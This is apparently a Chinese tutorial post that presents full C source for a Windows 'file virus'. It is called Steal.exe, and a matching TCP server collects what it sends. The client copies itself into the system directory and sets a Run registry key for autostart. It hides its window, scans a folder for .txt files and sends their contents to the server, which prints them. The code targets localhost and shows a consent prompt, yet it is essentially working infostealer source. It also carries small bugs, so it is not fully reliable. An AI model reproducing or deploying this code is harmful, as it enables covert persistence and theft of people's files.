文件病毒
- 一.windows下知识
- 句柄
- 禁用某些警告
- MAX_PATH
- _WIN32_FIND_DATAW
- FindFirstFileW
- 注册到服务代码(自启动)
- 隐藏窗口
- 二.客户端代码
- 三.服务端代码
一.windows下知识
句柄
相当于指针,用来表示windows下的一些对象;
禁用某些警告
MAX_PATH
windows下的路径数据变量;
_WIN32_FIND_DATAW
typedef struct
_WIN32_FIND_DATAW {
DWORD dwFileAttributes;//属性
FILETIME ftCreationTime;//创建时间
FILETIME ftLastAccessTime;//最后访问时间
FILETIME ftLastWriteTime;//最后写入时间
DWORD nFileSizeHigh;//文件大小的高位
DWORD nFileSizeLow;//文件大小的低位
DWORD dwReserved0;//保留字段
DWORD dwReserved1;//保留字段
_Field_z_ WCHAR cFileName[MAX_PATH ];//文件名
_Field_z_ WCHAR cAlternateFileName[ 14 ];//修改后的文件名
}
FindFirstFileW
FindFirstFileW(
_In_ LPCWSTR lpFileName,
_Out_ LPWIN32_FIND_DATAW lpFindFileData
);
注册到服务代码(自启动)
#include<io.h>
void AddToSystem()
{
HKEY hKEY;
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0;
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type =REG_SZ;
DWORD size =MAX_PATH;
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit
GetSystemDirectory(SysPath, size);
GetModuleFileName(NULL, CurrentPath, size);
//Copy File
FileCurrentName = CurrentPath;
FileNewName =lstrcat(SysPath, "\\Steal.exe");
struct _finddata_t Steal;
printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
if (_findfirst(FileNewName, &Steal) != -1)
return;//已经安装!
printf("ret2 = %d\n", ret);
int ihow =
MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。", "警告",
MB_YESNOCANCEL |
MB_ICONWARNING |
MB_TOPMOST);
if (ihow ==
IDCANCEL)
exit(0);
if (ihow ==
IDNO)
return;//只运行一次
//复制文件
ret =CopyFile(FileCurrentName, FileNewName,TRUE);
if (!ret)
{
return;
}
//加入注册表
printf("ret = %d\n", ret);
//打开注册表
ret =RegOpenKeyEx( HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
if (ret !=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
//Set Key
ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
if (ret !=
ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
隐藏窗口
void Hide() {
HWND hwnd = GetForegroundWindow();
ShowWindow(hwnd, SW_HIDE);
}
二.客户端代码
#include<stdio.h>
#include<Windows.h>
#include<io.h>
#pragma comment(lib,"ws2_32.lib")
int SendtoServer(const char* mypath) {
printf("TCP Client\n");
//初始化网络库
WORD wVersionRequested;
WSADATA wsaData;
int err;
char sendBuf[1024] = {0};
FILE* fp = fopen(mypath, "rb");
int len = fread(sendBuf, 1, 1024, fp);
fclose(fp);
wVersionRequested = MAKEWORD(1, 1);
// 初始化套接字库
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
return err;
}
if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
{
WSACleanup();
return -1;
}
//创建套接字
printf("create socket\n");
SOCKET sockCli = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockCli == INVALID_SOCKET) {
printf("create socket error: %d\n", GetLastError());
return -1;
}
//配置要连接的服务器
SOCKADDR_IN addsrv;
addsrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
addsrv.sin_family = AF_INET;
addsrv.sin_port = htons(6000);
//连接服务器
if (connect(sockCli, (SOCKADDR*)&addsrv, sizeof(addsrv)) == SOCKET_ERROR) {
printf("connect error = %d \n", GetLastError());
}
//收发数据
int iLen = send(sockCli, (char*)sendBuf, 100, 0);
//char recvBuf[100] = { 0 };
//iLen = recv(sockCli, recvBuf, 100, 0);
closesocket(sockCli);
WSACleanup();
return 0;
}
int DoSteal(const char* szPath) {
//1遍历szPath下的所有文件
WIN32_FIND_DATA FindFileData;
HANDLE hListFile;//文件句柄
char szFilePath[MAX_PATH] = {0};
strcpy(szFilePath, szPath);
strcat(szFilePath, "\\*");
//2.首先找到第一个文件
hListFile=FindFirstFile(szFilePath,&FindFileData);
//3.循环遍历所有文件
do {
char myPath[MAX_PATH] = { 0 };
strcpy(myPath, szPath);
strcpy(myPath, szPath);
strcat(myPath, FindFileData.cFileName);
if (strstr(myPath,"txt")) {
SendtoServer(myPath);
}
printf("%s\n",myPath);
} while (FindNextFile(hListFile, &FindFileData));
return 0;
}
void Hide() {
HWND hwnd = GetForegroundWindow();
ShowWindow(hwnd, SW_HIDE);
}
void AddToSystem()
{
HKEY hKEY;
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0;
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type =REG_SZ;
DWORD size =MAX_PATH;
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit
GetSystemDirectory(SysPath, size);
GetModuleFileName(NULL, CurrentPath, size);
//Copy File
FileCurrentName = CurrentPath;
FileNewName =lstrcat(SysPath, "\\Steal.exe");
struct _finddata_t Steal;
printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
if (_findfirst(FileNewName, &Steal) != -1)
return;//已经安装!
printf("ret2 = %d\n", ret);
int ihow =
MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。", "警告",
MB_YESNOCANCEL |
MB_ICONWARNING |
MB_TOPMOST);
if (ihow ==
IDCANCEL)
exit(0);
if (ihow ==
IDNO)
return;//只运行一次
//复制文件
ret =CopyFile(FileCurrentName, FileNewName,TRUE);
if (!ret)
{
return;
}
//加入注册表
printf("ret = %d\n", ret);
//打开注册表
ret =RegOpenKeyEx( HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
if (ret !=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
//Set Key
ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
if (ret !=
ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
int main() {
printf("Steal\n");
AddToSystem();
Hide();
DoSteal("D:\\file\\");
system("pause");
}
三.服务端代码
#include<Windows.h>
#include<iostream>
using namespace std;
#define MAX_SIZE 1024
#pragma comment(lib,"ws2_32.lib")
void ErreorHanding(const char*msg){
fputs(msg, stderr);
fputs("\n", stderr);
system("pause");
exit(-1);
}
int main() {
cout << "server" << endl;
//初始化网络库
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
// 初始化套接字库
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
ErreorHanding("WSAStartup error");
}
if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
{
ErreorHanding("LOBYTE error");
WSACleanup();
return -1;
}
//创建套接字
char msg[MAX_SIZE] = { 0 };
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == INVALID_SOCKET) {
ErreorHanding("socket error");
}
SOCKADDR_IN addr;
addr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
addr.sin_port = htons(6000);
addr.sin_family = AF_INET;
if (bind(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR)) == SOCKET_ERROR) {
ErreorHanding("bind error");
}
if (SOCKET_ERROR == listen(sock, 6)) {
ErreorHanding("listen error");
}
SOCKADDR_IN addrCli;
int cliAddrSize = sizeof(SOCKADDR_IN);
SOCKET cliSock;
int Len;
while(true){
cliSock = accept(sock, (SOCKADDR*)&addrCli, &cliAddrSize);
if (SOCKET_ERROR == cliSock) {
ErreorHanding("accept error");
}
while (Len = recv(cliSock, msg, MAX_SIZE, 0) != 0) {
printf("Server msg = %s\n", msg);
}
closesocket(cliSock);
}
}
